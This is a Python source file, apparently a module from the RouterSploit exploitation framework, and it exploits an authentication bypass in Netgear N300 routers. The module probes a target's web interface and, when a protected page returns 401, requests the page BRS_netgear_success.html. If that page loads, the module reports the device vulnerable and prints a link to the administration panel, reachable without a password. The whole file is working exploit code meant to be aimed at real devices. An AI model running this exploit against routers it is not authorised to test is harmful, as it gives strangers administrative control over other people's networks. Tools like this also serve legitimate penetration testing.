import requests

from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for Netgear N300 Authentication Bypass vulnerability.
    If the target is vulnerable link to bypass authentication will be provided"
    """
    __info__ = {
        'name': 'Netgear N300 Auth Bypass',
        'description': 'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.',
        'authors': [
            'Daniel Haake <daniel.haake[at]csnc.de>',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
        ],
        'targets': [
            'Netgear N300',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            url = sanitize_url("{}:{}".format(self.target, self.port))
            print "Visit {}/BRS_netgear_success.html\n".format(url)
        else:
            print_error("Target seems to be not vulnerable")

    def check(self):
        url = sanitize_url("{}:{}/".format(self.target, self.port))

        try:
            r = requests.get(url)
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError):
            return None  # target could not be verified

        if r.status_code == requests.codes.unauthorized:
            url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
            r = requests.get(url)

            if r.status_code == requests.codes.ok:
                return True

        return False  # target not vulnerable
